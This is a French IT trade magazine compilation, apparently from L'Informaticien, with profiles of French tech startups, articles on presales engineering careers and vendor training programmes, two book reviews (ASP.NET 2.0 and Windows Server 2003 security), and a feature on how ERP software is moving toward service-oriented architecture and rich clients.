Advestigo est une jeune entreprise qui se place sur une niche technologique d’avenir avec un produit unique. L’entreprise protège les actifs numériques par la théraographie, le calcul d’empreintes numériques, qui permet de reconnaître les copies exactes ou approchées.
La technologie permet une reconnaissance fine de matériau numérique et de l’indexation multimédia. Elle protège ainsi le capital numérique des entreprises.
Dirigée par Michel Roux et Hassane Essafi, le directeur scientifique, ancien du CEA-LETI, la société Advestigo est une coqueluche des capitaux-risqueurs et lèvent régulièrement des fonds pour financer son développement. Elle développe des partenariats avec Microsoft et Thomson. Une valeur quasi sûre de réussite du fait du marché sur lequel elle se place et sa technologie.


R-Truchot-092005_214640_Co7.gifRavy Truchot est le dirigeant de Skyrecon. Spécialité : la protection du poste de travail.
SKYRECON


Sécurité comportementale

Skyrecon est une jeune entreprise dans le secteur de la sécurité. Elle a été une des premières à se lancer dans les technologies comportementales pour protéger les postes de travail. La technologie s’appuie sur des années de développement sur la programmation kernel et l’intelligence artificielle. L’entreprise a reçu le soutien de la DGA (Délégation générale à l’armement) et de l’ANVAR. Récemment, elle a franchi une étape importante en signant un partenariat stratégique avec Microsoft qui apporte un soutien technologique et commercial.
Skyrecon lutte d’ores et déjà face aux grands du secteur et connaît une réussite commerciale intéressante avec des références clients flatteuses comme la direction générale de la Comptabilité publique au ministère des Finances ou des filiales du Groupe Suez.


d_duchateau15035_Copier8.gifDamien Duchateau est le dirigeant d’INES, une petite société qui fait son chemin dans le CRM en mode ASP.
INES


Le client à la demande

INES est une entreprise qui a pour particularité de s’inscrire dans la vague des applications de la gestion de la relation client en mode ASP. La solution couvre ce type de relation et la gestion commerciale. Avec 30 collaborateurs, la société a été distinguée par le CXP comme étant l’une des cinq plus consultées dans le secteur du CRM à la demande en France. Ses clients sont de toutes tailles comme la Poste, Sciences-Po, Nikon ou les Espaces SFR.


TALEND


ETL en Open Source

Cette jeune société également soutenue par l’ANVAR a développé un outil d’ETL en Open Source. S’appuyant sur la technologie des grilles de calcul, les logiciels sont écrits en Java et en Perl. Les produits de l’éditeur sont proposés sous deux formes, Open Source et commerciale pour les modules fonctionnels complémentaires. Ses principaux concurrents sont aujourd’hui Informatica, IBM et les autres acteurs dans le secteur des ETL. La technologie de Talend permet ainsi de s’affranchir de la dépendance à un seul fournisseur dans ce domaine, un point important dans l’intégration de données. La solution comporte de plus 38 000 connecteurs et un outil graphique de design des processus.


WIKIO


Le Web 2.0 mis en pratique

Chappaz16047_Copier9.gifAprès Kelkoo, Wikio. Pierre Chappaz est reparti dans le business !
Qui n’a pas entendu parler de Wikio ? Cette jeune entreprise fait déjà partie des vedettes de son secteur alors qu’elle vient tout juste de démarrer. Cet agrégateur de contenus d’information s’appuie sur les technologies du Web 2.0 pour laisser toute liberté à l’internaute de choisir les articles qu’ils souhaitent sur sa page de Wikio.
Pourquoi tant de battage ? Son fondateur, Pierre Chappaz, a déjà réalisé un coup de maître en revendant son ancienne entreprise, Kelkoo.com, à Yahoo. Son modèle économique s’appuie sur les liens sponsorisés. Alors seulement une inspiration d’un certain french flair ou aurore d’une nouvelle Sucess Story ?

Profil
Réduire
Avant-vente : des profils recherchés !
Par Bertrand Garé - Copyright L'INFORMATICIEN, tous droits réservés


Commerciaux sans l’être, multi compétences et véritables têtes chercheuses de nouvelles affaires, les ingénieurs avant-vente sont très demandés et font partie des profils prioritaires à l’embauche. Si la paye est bonne, le métier demande beaucoup d’effort, des qualités spécifiques, une disponibilité de tous les instants. Bienvenue dans le monde des moutons à cinq pattes !

Ils sont réclamés à cor et à cri… Parallèlement, les salaires s’envolent pour ces profils. Chez certains constructeurs, on atteint des sommets : le chiffre de 7 000 est parfois avancé ! Mais la part de salaire variable reste souvent très confidentielle…
Malgré cette forte incitation, les candidats ne se bousculent pas au portillon. Alors, pourquoi est-il difficile de trouver des gens très bien payés ?


N’est pas « avant-vente » qui veut

Première difficulté, il ne suffit pas de décider d’être un « avant-vente » pour le devenir. D’ailleurs, contrairement aux pays anglo-saxons, il n’existe pas en France de formation spécifique, ni de diplômes reconnus  pour ce type de commerciaux.
Franky Uzan, avant-vente chez EMC le confirme : « Je suis devenu avant-vente sur un concours de circonstances. Après mes études d’ingénieur à l’EISTI, j’ai monté ma propre entreprise dans le multimédia. Après la vente de mon activité, j’ai décidé de ne plus subir la pression et le stress à chaque trimestre. Cette expérience m’a été très salutaire et cela s’est très bien passé lors de mes entretiens pour entrer chez EMC. Le contact s’est bien fait. Il est important que le recruteur puisse se dire : ça me ferait plaisir de travailler avec cette personne là. »


Une fonction qui évolue

De plus, la fonction d’avant-vente a évolué depuis quelques années. Juste après l’an 2000, l’avant-vente avait un profil très technique « pur et dur », comme le souligne l’avant-vente de chez EMC. Depuis, le profil s’est élargi pour intégrer une approche beaucoup plus commerciale.
La typologie des avant-vente s’est aussi étoffée. Les profils sont plus ou moins nomades et plus ou moins liés à un compte client spécifique. Ainsi, Franky Uzan est attaché directement à un compte client : « J’ai mon bureau à la BNP, compte dont je m’occupe depuis 5 ans. »
Bruno Pencolé, avant-vente chez Borland, est lui plus nomade. « D’ailleurs, je me demande comment on peut ne pas l’être dans notre profession », précise-t-il ; « je travaille pour des missions courtes chez des clients où il est nécessaire d’intervenir de manière parfois opportuniste. »
André Jeannerot, directeur marketing et communication chez Lefebvre Software, les dépeint comme des nomades absolus : « Un jour à Strasbourg, le lendemain à Bordeaux, en ayant tout préparé avec le commercial avant, pour réaliser la présentation. Ils ont tout sur le portable. »


Des qualités spécifiques


Plus que la connaissance technique, Franky Uzan et Bruno Pencolé mettent an avant la qualité d’écoute nécessaire au consultant. Il ne s’agit pas de faire un show devant le client, mais bien de déterminer le plus finement possible les besoins du client pour y apporter la réponse adapté avec le catalogue produit de l’éditeur. Franky Uzan précise : « Ce point est vraiment important. Souvent un avant-vente peu expérimenté a du mal à supporter les silences lors des entretiens et meuble avec un langage technique sans se rendre compte qu’il dérape et ne s’intéresse plus au client. »
L’autre qualité primordiale ? « La curiosité », répondent-ils en chœur ! Le travail nécessite des efforts importants de veille, de recherche, de compréhension de l’entreprise client. « Voire jusqu’au contexte politique dans l’entreprise », assure Bruno Pencolé. Il ajoute : « Je passe près de 90 % de mon temps sur Internet. » Franky Uzan renchérit : « Il faut parfaitement connaître l’organigramme du client et exploiter toutes les informations disponibles. »
La dernière qualité essentielle est la disponibilité. Il faut ainsi pouvoir répondre rapidement à toutes les sollicitations du client. Pour les horaires, il faut plutôt « compter entre 40 et 50 heures ; et plus près des 50… », explique Bruno Pencolé, « néanmoins, mes week-end sont préservés. »


Un métier parfois frustrant

Le point le plus sensible de ce poste est parfois le côté frustrant du métier. Quand une vente importante est signée, la gloire rejaillit sur le commercial ; beaucoup moins sur l’avant-vente. Franky Uzan poursuit : « Il ne faut pas faire ce métier pour la gloire, le pouvoir, ou l’argent ; sinon la frustration guette. » Bruno Pencolé ajoute : « C’est la vrai question. Il faut que l’avant-vente soit associé à cette réussite. Cela passe par la part variable dans le salaire. »
Il y a toujours des amateurs ?
Formation
Réduire
Les grands éditeurs lancent leurs propres universités
Par Bertrand Garé - Copyright L'INFORMATICIEN, tous droits réservés

Avec la pénurie annoncée de spécialistes dans l’informatique, les grands éditeurs du marché créent des structures pour former et créer des emplois sur leurs technologies. En quelques semaines Microsoft, Oracle et SAP viennent de mettre en œuvre des programmes « Universités ». Si les formations apportées ne sont pas identiques, elles ont toutes le même but : former de futurs utilisateurs ou décideurs sur leurs produits propres.


Bojman.jpgPour Frédéric Bojman,Université .Net va permettre d’anticiper un manque de développeurs sur les technologies .Net
L’arrivée de nouvelles technologies comme .Net, Netweaver ou Fusion changent radicalement la manière d’utiliser ou de concevoir des solutions chez Microsoft, SAP ou Oracle. Derrière la montée en puissance de ces technologies se profilent le spectre du manque de spécialistes.
Frédéric Bojman, responsable marketing audience développeurs chez Microsoft, le confirme : « Nous constatons depuis plusieurs mois une multiplication du nombre de projets en entreprise autour de .Net. Il se profile une pénurie de compétences que nous nous devons d’anticiper. » Chez Oracle, l’explosion de la demande en ressources sur le marché des offres applicatives est mise en avant pour justifier le programme Executive University Oracle.
La question se pose de la même manière chez SAP, qui développe un programme pour fournir ses produits à des universités ou des écoles de haut niveau pour contribuer à mettre sur le marché des ressources formées sur ses produits et technologies afin d’améliorer les capacités de ses partenaires à déployer ses solutions.


Des formations et des débouchés différents

Les formations et débouchés sont différents selon les programmes proposés par les éditeurs. Ainsi, l’University Alliance Programme de SAP permet aux universités, écoles de commerce ou d’ingénieurs de se connecter en permanence sur des systèmes pré-paramétrés et de développer des modules de formation et des projets de recherche. Les connexions se font sur les progiciels SAP d’un centre de compétences opéré par un établissement d’enseignement supérieur (Université des Sciences Appliqués du Valais, en Suisse, pour la France). Trente établissements intègrent les outils SAP dans leurs cursus. Au total, six cents ingénieurs sont ainsi formés par an.
Chez Oracle, le programme est un peu différent et vise à former des consultants métier sur les ERP de l’éditeur. Le 30 mars dernier, une cinquantaine de candidats ont été sélectionnés pour débuter un apprentissage début juillet dans les locaux d’Oracle University, à Colombes (92), pour une durée de 5 à 6 semaines selon le cursus, des programmes de formation spécifiques qui visent à allier expertise fonctionnelle des connaissances progicielles et technologiques, en acquérant les compétences nécessaires à la mise en œuvre des produits Oracle E-business et Peoplesoft Finance et Ressources Humaines. Ce programme apporte une certification officielle de l’éditeur. Le programme va former près de 350 consultants dans les deux ans. À l’issu de la formation, les consultants trouveront des débouchés dans de grandes SSII partenaires avec des contrats en CDI. La formation apportée reste cependant liée aux métiers d’origine de l’élève (ressources humaines, contrôle de gestion, finance…).

Microsoft ouvre encore plus largement les portes de son Université.Net. Le programme permet l’accompagnement des partenaires de Microsoft dans la formation, la certification et le recrutement de développeurs .Net. L’université accueille de jeunes diplômés, des développeurs Java, mais également des profils différents souhaitant acquérir une double compétence. Les partenaires engagent les élèves en CDI et leur font suivre ce programme de formation qui débouche sur une certification sur les technologies Web ou Windows de l’éditeur. Ce programme est actuellement en phase pilote et sera réévalué à l’issue de la première vague de formation. Le cursus de quatre semaines inclut la découverte des technologies objet, la programmation en C#, l’accès aux données avec Visual Studio, le développement d’applications avec cet outil, la préparation et le passage des tests de certification. Pour participer au programme, il est nécessaire de s’inscrire sur le site msemploi.com avant la fin août. La formation se déroulera du 11 septembre au 5 octobre prochains. Depuis le lancement de cette initiative, 1 000 candidats ont été recrutés.
Livres
Réduire
ASP.jpgASP.NET 2.0 Étape par Étape
Auteur : George Shepherd, traduction de Xavier Guesnu
Éditeur : Microsoft Press
ISBN : 2100497782

ASP est une technologie Web dynamique développée par Microsoft Web s’appuyant sur une plate-forme Windows avec IIS installé (Internet Information Services). Avec .NET, l’ASP a évolué  vers l’ASP.NET qui autorise par exemple d’exécuter dynamiquement des pages codées en C#.
Il n’existe qu’une poignée de livres en français consacrés à ce sujet – la plupart sont en anglais. L’auteur, George Shepherd, est Américain, et contribue à MSDN Magazine, il n’est donc pas n’importe qui…
Les deux premiers chapitres se consacrent aux principes fondamentaux, comme l’évolution d’ASP NET vers le 2.0, la génération de l’incontournable application « Hello World », les pipelines ASP.NET, le modèle de compilation et l’affichage des assemblages. S’il existe un équivalent sous Mono (monodis.exe), il n’en sera ici nullement question, car tout l’argumentaire se fonde sur IIS et Visual Studio .NET 2005. Il est d’ailleurs indispensable de disposer d’un VS .NET 2005 fonctionnel sur sa machine pour profiter de toutes les techniques décrites, comme l’ajout de contrôles dans VS, les contrôles personnalisés, les contrôles composites, les contrôles de validation et les composants Webpart.
L’auteur aborde ensuite les détails de la configuration (comme avec le composant enfichable ASP.NET MMC), et de la connexion (autorisation et gestion des utilisateurs). La partie suivante traite la question de la liaison des données avec une base de données ; avec présentation des principaux contrôles liés aux données tels que GridView, FormView et DataList. Enfin, des sujets plus pointus sont passés au crible : comment utiliser la mise en cache pour améliorer les performances de vos applications, comment détecter, lister et réparer les erreurs de programmation, comment configurer et gérer les états de session, comment créer et utiliser des services Web, et comment compiler et déployer vos applications.
Les fichiers exercices et les exemples sont disponibles en ligne. Il s’agit d’un très bon livre pour les débutants sous ASP NET 2.0, ou qui migrent d’ASP NET 1.X vers ASP.NET 2.0. Seul problème – de taille –, la configuration logicielle requise pour en profiter : IIS, VS NET 2005, SQL Server 2005 (ou celle gratuite d’Express), XP avec le SP2, et une bonne machine pour supporter l’ensemble !



EFS_IPSEC_SSL.jpg EFS, IPSEC, SSL - Mise en œuvre de la sécurité sous Windows Server 2003
Auteur : Benoît Lanlard
Éditeur : ENI
ISBN : 2746031310

L’éditeur ENI a extrait ce livre du titre « Windows Server 2003 – Administration de la sécurité ». Il comporte trois chapitres : mise en œuvre d’EFS, mise en œuvre d’IPSEC (Internet Protocol Security), un protocole permettant le transport de données sécurisées sur un réseau IP, et mise en œuvre de SSL. Entre parenthèse SSL (Secure Socket Layer), protocole de sécurisation des échanges sur Internet, a été rebaptisé en 2001 Transport Layer Security (TLS) par l’IETF, mais c’est l’ancienne appellation SSL qui est la plus connue.
Le chapitre qui nous a le plus intéressé est celui consacré à EFS. EFS signifie « Encrypting File System ». Il s’agit d’un système de fichiers disponible sous Windows Server 2003 (et XP Pro mais non la version Home) qui permet d’enregistrer des fichiers cryptés au-dessus de NTFS. Après en avoir décrit le principe de fonctionnement, l’auteur aborde un sujet des plus intéressants : que devient un fichier crypté s’il est copié vers une destination ? Par exemple, si le fichier crypté est recopié sur une machine NT4, le fichier sera décrypté. On y apprend aussi que via ActiveDirectory, il est possible de mettre en place une stratégie qui permet de désactiver EFS. L’administrateur peut également prévoir un agent de recouvrement, en fait un utilisateur tiers, capable d’accéder à vos données chiffrées.
Ce TechNote est très réussi : nous plongeons dans la pratique, avec souvent des photos d’écrans à l’appui, pour mettre en œuvre des technologies pointues de cryptage sous Windows. Benoît Lanlard maîtrise parfaitement son sujet (il est MCE sur Windows 2003). Un bon ouvrage qui s’adresse à un public de techniciens avertis, connaissant déjà les rouages de TCP, et possédant aussi un solide bagage sur l’infrastructure de chiffrement à clé publique et les cryptages symétrique et asymétrique.    n
Dossier ERP
Réduire
Le nouveau visage des ERP
Par Bertrand Garé - Copyright L4INFORMATICIEN, tous droits réservés

Dessin1.jpgUne ébauche rapide d’une architecture SOA et des liens entre les différents niveaux de données.
Avec l’apport des nouvelles technologies, les ERP se renouvellent rapidement. Architecture, ergonomie, fonctionnalités changent et se rapprochent des utilisateurs. Conséquences moins visibles, les évolutions ont un impact important sur les projets et le déploiement de ces progiciels.


Pour beaucoup, les ERP ont encore une image de lourdeur à la fois dans l’utilisation ou la mise en place. Pourtant, depuis 18 mois, ils s’adaptent pour se faire plus légers et plus proches des besoins des utilisateurs.
Lors du dernier Sapphire, la conférence des utilisateurs de SAP, Léo Apotheker mettait en exergue une problématique importante de l’ERP : « L’informatique de gestion vit depuis des années un éternel débat. Doit-on construire soi-même son système d’information ou, au contraire, s’appuyer sur un progiciel du marché pour le mettre en œuvre ? Le progiciel a certes gagné beaucoup de terrain sur le sur-mesure ces dernières années, et la croissance de SAP en découle… Le vrai enjeu pour nous est de mettre fin à ce débat. Nos clients cherchent à standardiser 80 % de leur processus mais, en même temps, ils souhaitent se singulariser sur les 20 % qui font vraiment la différence. Combiner ces deux besoins plutôt que les opposer, voilà l’enjeu de notre nouvelle plate-forme (Enterprise SOA). Par un principe de composition, elle permet d’assembler selon ses propres besoins un ensemble de composants standard conçus par SAP et ses partenaires. »
Autrement appelé « syndrome des 80 % », cette question est au cœur des évolutions vers des architectures orientées services de certains ERP. Le choix des ERP contraignait à choisir l’efficacité (l’automatisation de 80 % des processus) sur des fonctions peu différenciatrices (facturation, commande…) et de limiter les possibilités sur les véritables apports de valeur, les différences organisationnelles ou métier. L’architecture client / serveur y poussait aussi en enfermant le progiciel dans le périmètre, étendu ou non, de l’entreprise. La principale conséquence était de donner l’impression de ne pas coller aux véritables besoins métier des entreprises et de rendre nécessaires des phases importantes de gestion des changements lors des projets de mise en œuvre. La couverture des besoins restants se réalisait par des développements spécifiques, souvent difficiles à gérer lors des montées de version, ou par des produits du marché spécialisés, demandant des efforts d’intégration.
Le constat effectué, il fallait encore trouver une solution. Le développement des technologies s’appuyant sur des services y contribue.
Ces architectures utilisent une plate-forme avec un serveur d’applications permettant d’orchestrer différents services (Web services ou autres) pour les combiner dans des processus (voir nos différents articles parus dans l’Informaticien).
Pour SAP, par exemple, cette nouvelle architecture permet de combiner différents services autorisant une adaptation plus fine au métier du client, tout en restant dans ses processus et non dans des processus imposés, type best practices. Ces derniers ne représentent pas forcément la meilleure solution, principalement dans le segment moyen du marché. La structure des entreprises n’est pas forcément à la hauteur des exigences de tels processus de grands comptes. D’autres ERP, comme l’Américain Lawson, qui vient d’acquérir Intentia, ou le Suédois IFS, suivent la même tendance.


L’approche tout ERP : une illusion ?

L’architecture permet aussi de relier l’ERP à d’autres applicatifs de manière plus légère par l’invocation de services dans un processus. Une approche SOA permet donc une double ouverture : vers l’intérieur et l’extérieur du progiciel. L’apport supposé d’une telle approche est d’éviter ce décalage entre l’efficacité du progiciel et l’adaptation aux besoins du client. L’approche SOA est aussi le constat qu’une approche tout ERP a été une illusion. Le progiciel ne fait pas tout et il demande donc de se relier à d’autres applicatifs dans le périmètre de l’entreprise.
Si Oracle a une approche similaire avec son programme Fusion, la différence entre les deux éditeurs provient des constructions différentes de l’offre. SAP a construit son offre en interne avec des développements sur un langage propriétaire et assez peu ouvert et doit donc se tourner vers l’extérieur. A contrario, l’offre d’Oracle s’est largement construite par rachat et se doit donc d’orchestrer différents outils avec parfois des formats de données différents. Faire appel à l’approche SOA, utilisant des standards, autorise une véritable indépendance vis-à-vis des systèmes d’exploitation et des bases de données.
La conséquence, comme le souligne Karim Mokhnachi, directeur marketing d’Oracle France, est « la banalisation des fonctions de Back Office pour aller vers les éléments qui apportent de la valeur business dans les entreprises ».
Cette valeur business est d’ailleurs la première demande des prospects et clients des éditeurs d’ERP. Amor Bekrar, en charge de la filiale française d’IFS ajoute : « Aujourd’hui, dans les cahiers des charges, les clients nous demandent de répondre à leurs besoins sur des processus transversaux et non sur des fonctions. Les questions techniques ne viennent qu’à la fin. »


Publier des composants sous la forme de services

amor-bekrar7259_Copier5.gifAmor Bekrar, en charge du destin d’IFS en France, constate dans les cahiers des charges un mouvement de la fonction vers le processus.
Pour André Jeannerot, directeur marketing et communication chez Lefebvre Software, « l’approche processus est de plus en plus importante, car elle représente un vrai levier de changement dans un but d’optimisation et de gains en efficacité ». Pascale Urvoas, avant-vente chez Lawson Software acquiesce : « Nous sommes complètement dans cette tendance et nous travaillons sur une nouvelle plate-forme, Landmark, qui va nous permettre de publier nos composants sous forme de services. Notre but est de permettre des personnalisations plus efficaces tout en réduisant le nombre de lignes de code. Pour nous le client / serveur c’est déjà un peu du passé ! »
Jean-Marc Lafin, en charge de l’intégration des ERP, chez Euriware, parle lui de « désintégration de l’ERP ». « Étonnamment, les plates-formes des grands éditeurs étaient peut-être trop riches fonctionnellement et cela posait des problèmes lors des montées de version, pour la maintenance et l’évolution des solutions. »
Un autre aspect plus commercial est aussi mis en avant par l’intégrateur. « Les éditeurs désormais vendent cette plate-forme. C’est aussi pour eux une façon de développer des partenariats avec d’autres éditeurs qui développent des solutions complémentaires dessus. » Là, trois éditeurs se distinguent nettement : Microsoft, avec son Microsoft Business Framework et ses plates-formes Dynamics AX et Nav, SAP avec Netweaver et Oracle.
Microsoft est actuellement en phase intermédiaire sur ces produits pour aller vers une architecture complètement SOA à partir de 2007. Cette année sera marquée par la convergence de tous ses ERP, vers un seul produit à l’instar de ce que réalisera Oracle avec son programme fusion.


Le chant du cygne du client / serveur ?

Pour Jean-Marc Lafin, ce changement d’orientation marque « le chant du cygne de la plate-forme client / serveur, même si cela dépend beaucoup de la maturité de l’entreprise cliente pour son système d’information. »
Les autres éditeurs du marché sont plus prudents pour s’engager dans cette approche. Bruno Garett, directeur des ventes directes chez Qualiac, souligne que « de par notre place sur le marché, il nous a toujours fallu être indépendant des plates-formes : nous sommes donc loin de ces problèmes. » Il est cependant indéniable que cette évolution apporte une plus grande agilité aux ERP que les architectures antérieures. Elle nécessite cependant pour certains produits une réécriture par des langages objets pour créer les composants, unité de base des architectures SOA. Pour la plupart, comme IFS par exemple, ce travail avait été effectué quasiment dès la conception du progiciel.
L’approche est donc séduisante pour plus d’un éditeur d’ERP, même si tous ne s’engagent pas dans cette voie. Certains évoluent en suivant d’autres pistes. Tous mettent cependant en avant une intégration et une proximité plus affirmée avec les environnements des utilisateurs. Pour certains, comme Lawson Software, cette approche vers les utilisateurs est le complément d’objet direct de leur stratégie SOA.


Un client de plus en plus riche !

bruno-garett7266_Copier6.gifL’évolution vers un changement d’architecture ne concerne pas tous les ERP, en particulier celui de Qualiac, comme le confirme Bruno Garett, directeur des ventes directes chez l’éditeur.
L’approche vers les utilisateurs se réalise dans le cadre d’un processus de bout en bout. Ce processus nécessite de collaborer avec d’autres personnes de l’entreprise et de posséder les bonnes données au moment opportun. Auparavant, cet exercice se réalisait en ouvrant parfois une fenêtre dans chaque module de l’ERP concourant à la réalisation du processus. Record absolu, un processus pouvait ainsi enchaîner près de 40 écrans pour une tâche complexe. Aberrant pour un utilisateur. Le client / serveur atteignait, là, une de ses limites.
Les technologies Web ont apporté ensuite un mieux en proposant une interface de type portail. Cela restait cependant lourd et assez peu efficace. Un virage essentiel prend corps avec les interfaces clients riches. En combinant l’interface d’un client lourd et les possibilités d’accès par un simple navigateur, ces interfaces apportent confort d’utilisation, réduction de coût de déploiement et des possibilités dynamiques.
L’un des attraits est la possibilité de combiner l’environnement de travail habituel de l’utilisateur avec les outils propres à son métier, sans véritable changement, tout en conservant une interface ouvrant de nombreuses possibilités comme sur son PC habituel. Christophe Raymond, directeur technique et scientifique chez CEGID, s’enthousiasme : « C’est une vraie révolution. Cela autorise une réelle ouverture pour les architectures de déploiement, ou pour une ouverture sur le mode distant comme l’ASP. Aujourd’hui, cette technologie résiste à la charge et autorise une haute disponibilité. Elle permet de plus un déploiement identique sur toutes les tailles de sites et quel que soit le métier de l’entreprise. Ce déploiement est aussi économique, car nous utilisons la puissance du poste client. Les possibilités dynamiques proposées par Flex, .Net, Java et autres sont aussi un gros avantage. »
SAP intègre ainsi dans son interface MUSE les apports de Flex d’Adobe pour fournir à l’utilisateur les informations en temps réel et les transactions nécessaires à chaque fonction.
Pascale Urvoas le confirme : « actuellement, nous démarrons pratiquement tous nos projets sur des architectures client riche ou léger. Lorsqu’on propose le choix entre les deux architectures, client / serveur et client riche, les clients n’hésitent pas longtemps. » Actuellement, la version de Lawson se limite au navigateur Internet Explorer, dans sa version 6.
L’évolution de l’ergonomie vers le client riche a aussi des conséquences sur l’organisation du travail. André Jeannerot souligne que « le poste client riche permet d’optimiser l’organisation administrative en la rendant plus souple et moins coûteuse ». Pour Lefebvre Software, l’adaptation à ces nouvelles technologies a été importante. Une nouvelle version combinant une approche processus et une interface de restitution en client riche est à l’ordre du jour pour la rentrée de septembre. Elle a été totalement réécrite en Java. L’évolution vers cette nouvelle version se fera sous la forme « annule et remplace ».


Se rapprocher des suites bureautiques

Un autre pan du rapprochement des ERP avec l’environnement des utilisateurs s’appuie sur une intégration de plus en plus forte avec les environnements bureautiques.
Pour les suites de Microsoft, cette partie est une évidence ; on note une intégration poussée avec la suite bureautique Office. Elle devient de plus en plus forte dans les autres outils. SAP autorise la reprise de certains éléments d’Office dans des processus (comme les notes de frais par exemple) de son outil Duet.
Cette intégration est le plus souvent demandée par les clients eux-mêmes, principalement sur l’outil Excel. IFS, dans sa version 7, va proposer un outil – nom de code Attila – dans la lignée de Duet, mais fonctionnant non pas en prenant en compte la fonction mais le rôle de l’utilisateur. En effet, celui-ci, surtout dans les PME, peut être multiple. Il convient alors de lui procurer les bons outils dans chacun de ses rôles successifs tout au long de la journée. Les possibilités technologiques permettent ainsi d’agréger tous ces rôles dans une interface de type Web au sein d’un portail.
Cette approche par rôle s’impose. Lawson va accompagner son progiciel Landmark de l’interface ADA, qui autorise la personnalisation du workflow par l’utilisateur. Il organise son bureau métier selon
les rôles qu’il occupe sans se soucier
des technologies sous-jacentes. Pascale Urvoas résume ainsi que « le processus n’est plus juste un processus, mais un processus à soi qui reprend les habitudes de travail ».
Christophe Raymond ajoute que « dans le déploiement, il n’est plus nécessaire de configurer les postes, ce qui réduit les délais de mise en œuvre et apporte de véritables possibilités d’automatiser les déploiements ».


Toujours de nouvelles fonctions

Même avec le temps, le périmètre fonctionnel des ERP s’étend. Cette extension se réalise de multiples manières. Un des moteurs de cette extension se confond avec l’histoire même de chaque ERP. Certains ont été conçus pour répondre au départ aux besoins de sociétés de services, d’autres pour des industriels. Les points forts de chaque ERP se retrouvent dans cet historique. Ensuite, face à la demande des clients ou du marché, ils ont étendu le logiciel à d’autres fonctions. Christophe Raymond pointe aussi un axe de développement fonctionnel. « L’évolution fonctionnelle est souvent liée à la stratégie pour attaquer de nouveaux marchés. Beaucoup de nouveautés proviennent de là. L’impact devient très important pour décider d’une verticalisation ou non du progiciel. »
Karim Mokhnachi souligne cet aspect : « La verticalisation est vraiment l’une des grandes tendances du moment. » Les éditeurs multiplient ainsi les versions dédiées à des secteurs d’activités. Chez SAP, près de 26 progiciels répondent à des paramétrages ou des configurations spécifiques pour un métier. Ce phénomène de verticalisation est aussi une méthode de repli pour certains éditeurs de petite ou de moyenne taille, n’ayant pas les moyens de se développer sur tous les secteurs.


Intégrer la gestion documentaire

Christophe-Raymond-17361_C7.gifLe directeur technique de CEGID, Christophe Raymond, voit les évolutions fonctionnelles comme une opportunité d’attaquer de nouveaux marchés.
Malgré la diversité de l’offre des ERP avec leurs évolutions propres, il est possible de pointer quelques évolutions majeures sur certains secteurs fonctionnels.
Tout d’abord, la plupart des personnes interrogées sur ce dossier soulignent des demandes pour l’intégration d’outils permettant une meilleure collaboration à l’intérieur ou à l’extérieur de l’entreprise. Les principales réponses à cette demande se concrétisent par l’introduction de modules de gestion documentaire suivant le workflow ou les rôles de l’utilisateur dans l’entreprise. Extensity (ex-GEAC) ou Exact Software ont déjà ces fonctions intégrées. D’autres éditeurs y pensent…
Il faut y ajouter les outils de dématérialisation. Lefebvre Software a ainsi passé un partenariat avec ReadSoft dans le domaine pour offrir une solution à ses clients. L’extension fonctionnelle est aussi l’occasion de nouer des partenariats importants pour des éditeurs de taille moyenne. Les plus grands le font aussi. Ainsi, Microsoft a signé un partenariat pour fournir, en add-on de sa plate-forme, la gestion d’entrepôts de Manhattan Associates
Une autre demande fonctionnelle forte se porte sur les outils d’aide à la décision et le reporting. « Cette demande est présente à chaque fois », souligne Pascale Urvoas.
Le besoin pour ces outils fait partie d’une volonté affirmée d’aller vers plus d’agilité, à la fois dans les technologies et les fonctions de l’entreprise : production, vente / marketing, logistique…
Les évolutions demandées par les clients suivent aussi le contexte économique de la globalisation et des législations. Amor Bekrar, chez IFS, explique que « même les PME sont dans ce contexte. Aujourd’hui, leur concurrent n’est pas l’autre producteur local, mais n’importe quel industriel du secteur dans le monde entier ». D’ailleurs, la plupart des entreprises françaises, même petites, jouent un rôle important dans cette globalisation. Il n’est pas rare de voir une entreprise réaliser la conception d’un produit dans son centre de R & D, puis de faire assurer la fabrication des différents éléments, dans divers sites ou usines à l’étranger, avant de les faire revenir pour un assemblage en France ou dans un pays européen. Ce modèle, assez courant, nécessite pour les progiciels d’être multisites, multilingues et adaptés aux différentes législations en vigueur. Pascale Urvoas l’esquisse lorsqu’elle assure que la demande en langage Unicode pour les pays asiatiques devient une demande courante.


Gestion des risques

Les éditeurs de progiciels fournissant ce type de fonctions revendiquent par ailleurs dans leurs stratégies d’offrir des ERP complémentaires à de grands ERP centraux, installés dans les sièges d’entreprise. IFS, Exact Software et Microsoft l’affichent ainsi clairement. Christophe Dupuy, directeur marketing France de Microsoft Business Solutions, souligne : « Nous sommes complètement complémentaires d’ERP backbone, dans une approche connue sous le nom de Hub and Spoke. »
Pour les grands ERP, les extensions fonctionnelles prennent souvent pour appui les évolutions législatives. Ainsi, SAP a enrichi son offre d’un module de gestion des risques et de conformité à la législation ou aux bonnes pratiques de l’entreprise, profitant à la fois de l’expérience de l’éditeur sur des dossiers comme Sarbane-Oaxley ou Bâle 2 ou encore le développement durable. Le problème de la conformité à une déontologie ou à des pratiques de marché devient crucial pour de grandes entreprises et le système d’alerte que met en place ce module renforce le contrôle nécessaire aux activités de l’entreprise.
Jean-Marc Lafin résume cependant un peu le sentiment des clients des ERP : « Il est parfois difficile de suivre la logique du développement produit des éditeurs. Le problème provient surtout de la redondance de fonctions dans différents modules. Il est difficile de faire payer deux fois une fonction à un client et ce n’est pas notre rôle. »


Des impacts forts sur les projets

L’arrivée de nouvelles technologies et de nouvelles fonctions, parfois loin des modules habituellement installés, change aussi la donne pour les projets ou les déploiements de ces ERP « new look ».
Jean-Marc Lafin, intégrateur, est assez prudent sur les bienfaits à court terme de ces nouvelles technologies. « Nous avions des méthodes bien stabilisées pour le déploiement. L’approche proposée est très séduisante mais très complexe à mettre en œuvre. On se retrouve avec beaucoup de composants et des gestions de configuration à faire et à “maintenir”. Nous avons très peu de retour d’expérience sur ces nouvelles architectures. Un autre aspect est l’expérimentation, car on ne réalise pas deux fois la même installation avec ces technologies. Il va falloir du temps pour bien maîtriser la chose et fidéliser les compétences pour parvenir à de bons résultats. La réalité de terrain aujourd’hui est de voir le spécialiste chez l’éditeur plonger dans la documentation aux demandes du client. Ça fait pas très pro ! Il ne faudrait pas que les clients en fassent les frais. »
Le discours met en exergue un point important pour les intégrateurs. Le risque technologique devient une donnée essentielle en rendant la gestion du contrat plus complexe. Jean-Marc Lafin pose lui-même la question : « Sera-t-il encore possible réellement de proposer des contrats au forfait sur ce type de déploiement ? »


Un spécialiste techno accompagne un spécialiste métier

